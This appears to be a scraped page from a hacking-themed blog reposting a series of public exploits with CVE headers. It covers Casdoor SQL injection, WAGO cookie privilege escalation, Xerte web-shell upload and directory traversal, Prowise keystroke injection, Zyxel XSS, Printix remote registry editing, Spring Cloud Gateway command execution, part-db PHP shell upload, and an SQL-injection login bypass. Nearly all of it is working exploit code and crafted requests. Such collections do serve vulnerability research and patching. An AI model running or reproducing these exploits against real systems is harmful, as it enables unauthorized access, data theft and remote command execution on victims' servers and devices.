    // Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) // Date: 2022-02-25 // Exploit Author: Mayank Deshmukh // Vendor Homepage: https://casdoor.org/ // Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0 // Version: version < 1.13.1 // Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r // Tested on: Kali Linux // CVE : CVE-2022-24124 // Github POC: https://github.com/ColdFusionX/CVE-2022-24124 // Exploit Usage : go run exploit.go -u http://127.0.0.1:8080 package main import ( "flag" "fmt" "html" "io/ioutil" "net/http" "os" "regexp" "strings" ) func main() { var url string flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)") flag.Parse() banner := ` -=Casdoor SQL Injection (CVE-2022-24124)=- - by Mayank Deshmukh (ColdFusionX) ` fmt.Printf(banner) fmt.Println("[*] Dumping Database Version") response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)") if err != nil { panic(err) } defer response.Body.Close() databytes, err := ioutil.ReadAll(response.Body) if err != nil { panic(err) } content := string(databytes) re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)") result := re.FindAllString(content, -1) sqliop := fmt.Sprint(result) replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "") finalop := replacer.Replace(sqliop) fmt.Println(html.UnescapeString(finalop)) if result == nil { fmt.Printf("Application not vulnerable\n") os.Exit(1) } }
  17. HireHackking

    WAGO 750-8212 PFC200 G2 2ETH RS - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WAGO 750-8212 PFC200 G2 2ETH RS Privilege Escalation # Date: 02/16/2022 # Exploit Author: Momen Eldawakhly (Cyber Guy) at Cypro AB # Vendor Homepage: https://www.wago.com # Version: Firmware version 03.05.10(17) # Tested on: PopOS! [Linux](Firefox) ======================================== = The ordinary user privilege request: ======================================== GET /wbm/ HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.1/wbm/ Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22user%22%2C%22roles%22:[%22user%22%2C%22guest%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642368720673%2C%22sessionExists%22:true} ========================================== = Manipulated Cookie to Admin Privilege: ========================================== GET /wbm/ HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Referer: http://192.168.1.1/wbm/ Cookie: NG_WBM_SESSION=qru3ocrpde79m5f73526i65uv5; user={%22name%22:%22admin%22%2C%22roles%22:[%22admin%22%2C%22admin%22]%2C%22hasDefaultPassword%22:true%2C%22csrf%22:%22U2fJfixrfWtLEbVFL6b71oou1yk1WqKTsdFo52yavqrTF86f%22%2C%22timestamp%22:1642369499829%2C%22sessionExists%22:true}
  18. HireHackking

    Xerte 3.9 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xerte 3.9 - Remote Code Execution (RCE) (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.8.5-33.zip # Version: up until version 3.9 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44664 # This PoC assumes guest login is enabled and the en-GB langues files are used. # This PoC wil overwrite the existing langues file (.inc) for the englisch index page with a shell. # Vulnerable url: https://<host>/website_code/php/import/fileupload.php # The mediapath variable can be used to set the destination of the uploaded. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota import requests import re xerte_base_url = "http://127.0.0.1" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to find the install path template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the install path: install_path = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) install_path = re.findall('mediapath" value="(.+?)"', install_path.text)[0] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', 'Accept-Language': 'nl,en-US;q=0.7,en;q=0.3', 'Content-Type': 'multipart/form-data; boundary=---------------------------170331411929658976061651588978', } # index.inc file data = \ '''-----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="filenameuploaded"; filename="index.inc" Content-Type: application/octet-stream <?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; } /** * * index.php english language file * * @author Patrick Lockley * @version 1.0 * @copyright Pat Lockley * @package */ define("INDEX_USERNAME_AND_PASSWORD_EMPTY", "Please enter your username and password"); define("INDEX_USERNAME_EMPTY", "Please enter your username"); define("INDEX_PASSWORD_EMPTY", "Please enter your password"); define("INDEX_LDAP_MISSING", "PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_SITE_ADMIN", "Site admins should log on on the manangement page"); define("INDEX_LOGON_FAIL", "Sorry that password combination was not correct"); define("INDEX_LOGIN", "login area"); define("INDEX_USERNAME", "Username"); define("INDEX_PASSWORD", "Password"); define("INDEX_HELP_TITLE", "Getting Started"); define("INDEX_HELP_INTRODUCTION", "We\'ve produced a short introduction to the Toolkits website."); define("INDEX_HELP_INTRO_LINK_TEXT","Show me!"); define("INDEX_NO_LDAP","PHP\'s LDAP library needs to be installed to use LDAP authentication. If you read the install guide other options are available"); define("INDEX_FOLDER_PROMPT","What would you like to call your folder?"); define("INDEX_WORKSPACE_TITLE","My Projects"); define("INDEX_CREATE","Project Templates"); define("INDEX_DETAILS","Project Details"); define("INDEX_SORT","Sort"); define("INDEX_SEARCH","Search"); define("INDEX_SORT_A","Alphabetical A-Z"); define("INDEX_SORT_Z","Alphabetical Z-A"); define("INDEX_SORT_NEW","Age (New to Old)"); define("INDEX_SORT_OLD","Age (Old to New)"); define("INDEX_LOG_OUT","Log out"); define("INDEX_LOGGED_IN_AS","Logged in as"); define("INDEX_BUTTON_LOGIN","Login"); define("INDEX_BUTTON_LOGOUT","Logout"); define("INDEX_BUTTON_PROPERTIES","Properties"); define("INDEX_BUTTON_EDIT","Edit"); define("INDEX_BUTTON_PREVIEW", "Preview"); define("INDEX_BUTTON_SORT", "Sort"); define("INDEX_BUTTON_NEWFOLDER", "New Folder"); define("INDEX_BUTTON_NEWFOLDER_CREATE", "Create"); define("INDEX_BUTTON_DELETE", "Delete"); define("INDEX_BUTTON_DUPLICATE", "Duplicate"); define("INDEX_BUTTON_PUBLISH", "Publish"); define("INDEX_BUTTON_CANCEL", "Cancel"); define("INDEX_BUTTON_SAVE", "Save"); define("INDEX_XAPI_DASHBOARD_FROM", "From:"); define("INDEX_XAPI_DASHBOARD_UNTIL", "Until:"); define("INDEX_XAPI_DASHBOARD_GROUP_SELECT", "Select group:"); define("INDEX_XAPI_DASHBOARD_GROUP_ALL", "All groups"); define("INDEX_XAPI_DASHBOARD_SHOW_NAMES", "Show names and/or email addresses"); define("INDEX_XAPI_DASHBOARD_CLOSE", "Close dashboard"); define("INDEX_XAPI_DASHBOARD_DISPLAY_OPTIONS", "Display options"); define("INDEX_XAPI_DASHBOARD_SHOW_HIDE_COLUMNS", "Show / hide columns"); define("INDEX_XAPI_DASHBOARD_QUESTION_OVERVIEW", "Interaction overview"); define("INDEX_XAPI_DASHBOARD_PRINT", "Print"); \r \r -----------------------------170331411929658976061651588978 Content-Disposition: form-data; name="mediapath" ''' \ + install_path \ + '''../../../languages/en-GB/ -----------------------------170331411929658976061651588978--\r ''' # Overwrite index.inc file response = session.post(xerte_base_url + '/website_code/php/import/fileupload.php', headers=headers, data=data) print('Installation path: ' + install_path) print(response.text) if "success" in response.text: print("Visit shell @: " + xerte_base_url + '/?cmd=whoami')
  19. HireHackking

    Xerte 3.10.3 - Directory Traversal (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Xerte 3.10.3 - Directory Traversal (Authenticated) # Date: 05/03/2021 # Exploit Author: Rik Lutz # Vendor Homepage: https://xerte.org.uk # Software Link: https://github.com/thexerteproject/xerteonlinetoolkits/archive/refs/heads/3.9.zip # Version: up until 3.10.3 # Tested on: Windows 10 XAMP # CVE : CVE-2021-44665 # This PoC assumes guest login is enabled. Vulnerable url: # https://<host>/getfile.php?file=<user-direcotry>/../../database.php # You can find a userfiles-directory by creating a project and browsing the media menu. # Create new project from template -> visit "Properties" (! symbol) -> Media and Quota -> Click file to download # The userfiles-direcotry will be noted in the URL and/or when you download a file. # They look like: <numbers>-<username>-<templatename> import requests import re xerte_base_url = "http://127.0.0.1" file_to_grab = "/../../database.php" php_session_id = "" # If guest is not enabled, and you have a session ID. Put it here. with requests.Session() as session: # Get a PHP session ID if not php_session_id: session.get(xerte_base_url) else: session.cookies.set("PHPSESSID", php_session_id) # Use a default template data = { 'tutorialid': 'Nottingham', 'templatename': 'Nottingham', 'tutorialname': 'exploit', 'folder_id': '' } # Create a new project in order to create a user-folder template_id = session.post(xerte_base_url + '/website_code/php/templates/new_template.php', data=data) # Find template ID data = { 'template_id': re.findall('(\d+)', template_id.text)[0] } # Find the created user-direcotry: user_direcotry = session.post(xerte_base_url + '/website_code/php/properties/media_and_quota_template.php', data=data) user_direcotry = re.findall('USER-FILES\/([0-9]+-[a-z0-9]+-[a-zA-Z0-9_]+)', user_direcotry.text)[0] # Grab file result = session.get(xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab) print(result.text) print("|-- Used Variables: --|") print("PHP Session ID: " + session.cookies.get_dict()['PHPSESSID']) print("user direcotry: " + user_direcotry) print("Curl example:") print('curl --cookie "PHPSESSID=' + session.cookies.get_dict()['PHPSESSID'] + '" ' + xerte_base_url + '/getfile.php?file=' + user_direcotry + file_to_grab)
  20. HireHackking

    Prowise Reflect v1.0.9 - Remote Keystroke Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection # Date: 30/10/2022 # Exploit Author: Rik Lutz # Vendor Homepage: https://www.prowise.com/ # Version: V1.0.9 # Tested on: Windows 10 # Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection. # Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed), # or by visiting a malicious website. This POC contains the malicious webpage. # Steps: # 1. Start Prowise reflect # 2. Try to connect to a reflect server e.q. ygm7u6od # 3. When it is connecting click exploit # - Start menu will open, types notepad.exe and types hello world. <!DOCTYPE HTML> <html> <head> <script type = "text/javascript"> function wait(ms){ var start = new Date().getTime(); var end = start; while(end < start + ms) { end = new Date().getTime(); } } function WebSocketTest() { var StateConnecting = new Boolean(false); if ("WebSocket" in window) { // Let us open a web socket var ws = new WebSocket("ws://localhost:8082"); ws.onopen = function() { ws.send('{"event":"keyboard", "key":"super"}'); wait(400); //character is slower // ws.send('{"event":"keyboard", "character":"notepad.exe"}'}; // You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true var exploitcode = "notepad.exe" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(300); ws.send('{"event":"keyboard", "key":"enter"}'); wait(2000); exploitcode = "Hello world!" for (let i = 0; i < exploitcode.length; i++) { ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}'); } wait(200); }; ws.onmessage = function (evt) { var received_msg = evt.data; }; ws.onclose = function() { // websocket is closed. alert("Connection is closed..."); }; } else { // The browser doesn't support WebSocket alert("WebSocket NOT supported by your Browser!"); } } </script> </head> <body> <div id = "sse"> <a href = "javascript:WebSocketTest()">Exploit!</a> </div> </body> </html>
  21. HireHackking

    Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting (XSS) # Date: 1/3/2022 # Exploit Author: Momen Eldawakhly (CyberGuy) # Vendor Homepage: https://www.zyxel.com # Version: ZyWALL 2 Plus # Tested on: Ubuntu Linux [Firefox] # CVE : CVE-2021-46387 GET /Forms/rpAuth_1?id=%3C/form%3E%3CiMg%20src=x%20onerror=%22prompt(1)%22%3E%3Cform%3E HTTP/1.1 Host: vuln.ip:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1
  22. HireHackking

    Printix Client 1.3.1106.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Printix Client 1.3.1106.0 - Remote Code Execution (RCE) # Date: 3/1/2022 # Exploit Author: Logan Latvala # Vendor Homepage: https://printix.net # Software Link: https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip # Version: <= 1.3.1106.0 # Tested on: Windows 7, Windows 8, Windows 10, Windows 11 # CVE : CVE-2022-25089 # Github for project: https://github.com/ComparedArray/printix-CVE-2022-25089 using Microsoft.Win32; using Newtonsoft.Json; using Newtonsoft.Json.Converters; using System; using System.Collections.Generic; using System.Diagnostics; using System.Linq; using System.Text; using System.Threading; using System.Threading.Tasks; /** * ________________________________________ * * Printix Vulnerability, CVE-2022-25089 * Part of a Printix Vulnerability series * Author: Logan Latvala * Github: https://github.com/ComparedArray/printix-CVE-2022-25089 * ________________________________________ * */ namespace ConsoleApp1a { public class PersistentRegistryData { public PersistentRegistryCmds cmd; public string path; public int VDIType; public byte[] registryData; } [JsonConverter(typeof(StringEnumConverter))] public enum PersistentRegistryCmds { StoreData = 1, DeleteSubTree, RestoreData } public class Session { public int commandNumber { get; set; } public string host { get; set; } public string data { get; set; } public string sessionName { get; set; } public Session(int commandSessionNumber = 0) { commandNumber = commandSessionNumber; switch (commandSessionNumber) { //Incase it's initiated, kill it immediately. case (0): Environment.Exit(0x001); break; //Incase the Ping request is sent though, get its needed data. case (2): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); data = "pingData"; sessionName = "PingerRinger"; break; //Incase the RegEdit request is sent though, get its needed data. case (49): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); PersistentRegistryData persistentRegistryData = new PersistentRegistryData(); persistentRegistryData.cmd = PersistentRegistryCmds.RestoreData; persistentRegistryData.VDIType = 12; //(int)DefaultValues.VDIType; //persistentRegistryData.path = "printix\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName"; Console.WriteLine("\n What Node starting from \\\\Local-Machine\\ would you like to select? \n"); Console.WriteLine("Example: HKEY_LOCAL_MACHINE\\SOFTWARE\\Intel\\HeciServer\\das\\SocketServiceName\n"); Console.WriteLine("You can only change values in HKEY_LOCAL_MACHINE"); Console.Write("Registry Node: "); persistentRegistryData.path = "" + Console.ReadLine().Replace("HKEY_LOCAL_MACHINE","printix"); Console.WriteLine("Full Address Set To: " + persistentRegistryData.path); //persistentRegistryData.registryData = new byte[2]; //byte[] loader = selectDataType("Intel(R) Capability Licensing stuffidkreally", RegistryValueKind.String); Console.WriteLine("\n What Data type are you using? \n1. String 2. Dword 3. Qword 4. Multi String \n"); Console.Write("Type: "); int dataF = int.Parse(Console.ReadLine()); Console.WriteLine("Set Data to: " + dataF); Console.WriteLine("\n What value is your type? \n"); Console.Write("Value: "); string dataB = Console.ReadLine(); Console.WriteLine("Set Data to: " + dataF); byte[] loader = null; List<byte> byteContainer = new List<byte>(); //Dword = 4 //SET THIS NUMBER TO THE TYPE OF DATA YOU ARE USING! (CHECK ABOVE FUNCITON selectDataType()!) switch (dataF) { case (1): loader = selectDataType(dataB, RegistryValueKind.String); byteContainer.Add(1); break; case (2): loader = selectDataType(int.Parse(dataB), RegistryValueKind.DWord); byteContainer.Add(4); break; case (3): loader = selectDataType(long.Parse(dataB), RegistryValueKind.QWord); byteContainer.Add(11); break; case (4): loader = selectDataType(dataB.Split('%'), RegistryValueKind.MultiString); byteContainer.Add(7); break; } int pathHolder = 0; foreach (byte bit in loader) { pathHolder++; byteContainer.Add(bit); } persistentRegistryData.registryData = byteContainer.ToArray(); //added stuff: //PersistentRegistryData data = new PersistentRegistryData(); //data.cmd = PersistentRegistryCmds.RestoreData; //data.path = ""; //data.cmd Console.WriteLine(JsonConvert.SerializeObject(persistentRegistryData)); data = JsonConvert.SerializeObject(persistentRegistryData); break; //Custom cases, such as custom JSON Inputs and more. case (100): Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n"); Console.Write("IP: "); host = Console.ReadLine(); Console.WriteLine("Host address set to: " + host); Console.WriteLine("\n What Data Should Be Sent?\n"); Console.Write("Data: "); data = Console.ReadLine(); Console.WriteLine("Data set to: " + data); Console.WriteLine("\n What Session Name Should Be Used? \n"); Console.Write("Session Name: "); sessionName = Console.ReadLine(); Console.WriteLine("Session name set to: " + sessionName); break; } } public static byte[] selectDataType(object value, RegistryValueKind format) { byte[] array = new byte[50]; switch (format) { case RegistryValueKind.String: //1 array = Encoding.UTF8.GetBytes((string)value); break; case RegistryValueKind.DWord://4 array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value)); break; case RegistryValueKind.QWord://11 if (value == null) { value = 0L; } array = BitConverter.GetBytes((long)value); break; case RegistryValueKind.MultiString://7 { if (value == null) { value = new string[1] { string.Empty }; } string[] array2 = (string[])value; foreach (string s in array2) { byte[] bytes = Encoding.UTF8.GetBytes(s); byte[] second = new byte[1] { (byte)bytes.Length }; array = array.Concat(second).Concat(bytes).ToArray(); } break; } } return array; } } class CVESUBMISSION { static void Main(string[] args) { FORCERESTART: try { //Edit any registry without auth: //Use command 49, use the code provided on the desktop... //This modifies it directly, so no specific username is needed. :D //The command parameter, a list of commands is below. int command = 43; //To force the user to input variables or not. bool forceCustomInput = false; //The data to send, this isn't flexible and should be used only for specific examples. //Try to keep above 4 characters if you're just shoving things into the command. string data = "{\"profileID\":1,\"result\":true}"; //The username to use. //This is to fulfill the requriements whilst in development mode. DefaultValues.CurrentSessName = "printixMDNs7914"; //The host to connect to. DEFAULT= "localhost" string host = "192.168.1.29"; // Configuration Above InvalidInputLabel: Console.Clear(); Console.WriteLine("Please select the certificate you want to use with port 21338."); //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now. Console.WriteLine("Already selected, client authentication isn't needed."); Console.WriteLine(" /───────────────────────────\\ "); Console.WriteLine("\nWhat would you like to do?"); Console.WriteLine("\n 1. Send Ping Request"); Console.WriteLine(" 2. Send Registry Edit Request"); Console.WriteLine(" 3. Send Custom Request"); Console.WriteLine(" 4. Experimental Mode (Beta)\n"); Console.Write("I choose option # "); try { switch (int.Parse(Console.ReadLine().ToLower())) { case (1): Session session = new Session(2); command = session.commandNumber; host = session.host; data = session.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (2): Session sessionTwo = new Session(49); command = sessionTwo.commandNumber; host = sessionTwo.host; data = sessionTwo.data; DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200); break; case (3): Console.WriteLine("What command number do you want to input?"); command = int.Parse(Console.ReadLine().ToString()); Console.WriteLine("What IP would you like to use? (Default = localhost)"); host = Console.ReadLine(); Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)"); data = Console.ReadLine(); Console.WriteLine("What session name do you want to use? "); DefaultValues.CurrentSessName = Console.ReadLine(); break; case (4): Console.WriteLine("Not yet implemented."); break; } } catch (Exception e) { Console.WriteLine("Invalid Input!"); goto InvalidInputLabel; } Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala"); Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n"); CompCommClient client = new CompCommClient(); byte[] responseStorage = new byte[25555]; int responseCMD = 0; client.Connect(host, 21338, 3, 10000); client.SendMessage(command, Encoding.UTF8.GetBytes(data)); // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it. // Check for output multiple times, and see if this is conclusive. //client.SendMessage(51, Encoding.ASCII.GetBytes(data)); new Thread(() => { //Thread.Sleep(4000); if (client.Connected()) { int cam = 0; // 4 itterations of loops, may be lifted in the future. while (cam < 5) { //Reads the datastream and keeps returning results. //Thread.Sleep(100); try { try { if (responseStorage?.Any() == true) { //List<byte> byo1 = responseStorage.ToList(); if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption")) { foreach (char cam2 in Encoding.UTF8.GetString(responseStorage)) { if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2)) { Console.Write(cam2); } } }else { } } } catch (Exception e) { Debug.WriteLine(e); } client.Read(out responseCMD, out responseStorage); } catch (Exception e) { goto ReadException; } Thread.Sleep(100); cam++; //Console.WriteLine(cam); } } else { Console.WriteLine("[WARNING]: Client is Disconnected!"); } ReadException: try { Console.WriteLine("Command Variable Response: " + responseCMD); Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD); client.disConnect(); } catch (Exception e) { Console.WriteLine("After 4.2 Seconds, there has been no response!"); client.disConnect(); } }).Start(); Console.WriteLine(responseCMD); Console.ReadLine(); } catch (Exception e) { Console.WriteLine(e); Console.ReadLine(); //Environment.Exit(e.HResult); } goto FORCERESTART; } } }
  23. HireHackking

    Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) # Google Dork: N/A # Date: 03/03/2022 # Exploit Author: Carlos E. Vieira # Vendor Homepage: https://spring.io/ # Software Link: https://spring.io/projects/spring-cloud-gateway # Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1 # Tested on: 3.1.0 # CVE : CVE-2022-22947 import random import string import requests import json import sys import urllib.parse import base64 headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} proxies = { 'http': 'http://172.29.32.1:8081', 'https': 'http://172.29.32.1:8081', } id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) def exploit(url, command): payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8') rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False) if(rbase.status_code == 201): print("[+] Stage deployed to /actuator/gateway/routes/"+id) print("[+] Executing command...") r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False) if(r.status_code == 200): print("[+] getting result...") r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) if(r.status_code == 200): get_response = r.json() clean(url, id) return get_response['filters'][0].split("'")[1] else: print("[-] Error: Invalid response") clean(url, id) exit(1) else: clean(url, id) print("[-] Error executing command") def clean(url, id): remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False) if(remove.status_code == 200): print("[+] Stage removed!") else: print("[-] Error: Fail to remove stage") def banner(): print(""" ################################################### # # # Exploit for CVE-2022-22947 # # - Carlos Vieira (Crowsec) # # # # Usage: # # python3 exploit.py <url> <command> # # # # Example: # # python3 exploit.py http://localhost:8080 'id' # # # ################################################### """) def main(): banner() if len(sys.argv) != 3: print("[-] Error: Invalid arguments") print("[-] Usage: python3 exploit.py <url> <command>") exit(1) else: url = sys.argv[1] command = sys.argv[2] print(exploit(url, command)) if __name__ == '__main__': main()
  24. HireHackking

    part-db 0.5.11 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE) # Google Dork: NA # Date: 03/04/2022 # Exploit Author: Sunny Mehra @DSKMehra # Vendor Homepage: https://github.com/part-db/part-db # Software Link: https://github.com/part-db/part-db # Version: [ 0.5.11.] # Tested on: [KALI OS] # CVE : CVE-2022-0848 # --------------- #!/bin/bash host=127.0.0.1/Part-DB-0.5.10 #WEBHOST #Usage: Change host #Command: bash exploit.sh #EXPLOIT BY @DSKMehra echo "<?php system(id); ?>">POC.phtml #PHP Shell Code result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'` rm POC.phtml echo Shell Location : "$host/data/media/labels/$result"
  25. HireHackking

    Attendance and Payroll System v1.0 - SQLi Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass # Date: 04/03/2022 # Exploit Author: pr0z # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError print('\n >> Attendance and Payroll System v1.0') print(' >> Authentication Bypass through SQL injection') print(' >> By pr0z\n') login_path = '/apsystem/admin/login.php' index_path = '/apsystem/admin/index.php' payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login=" headers = {'Content-Type': 'application/x-www-form-urlencoded'} #proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'} # Check for arguments if len(sys.argv) < 2 or '-h' in sys.argv: print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1") sys.exit() # Bypass Authentication target = sys.argv[1] print("[+] Extracting Administrator cookie using SQLi ...") sess = requests.Session() try: sess.get(target + index_path,headers=headers, verify=False) sess.post(target + login_path, data=payload, headers=headers,verify=False) except ConnectionError: print('[-] We were unable to establish a connection') sys.exit() cookie_val = sess.cookies.get_dict().get("PHPSESSID") print("[+] Use the following cookie:\n") print(f"PHPSESSID: {cookie_val}")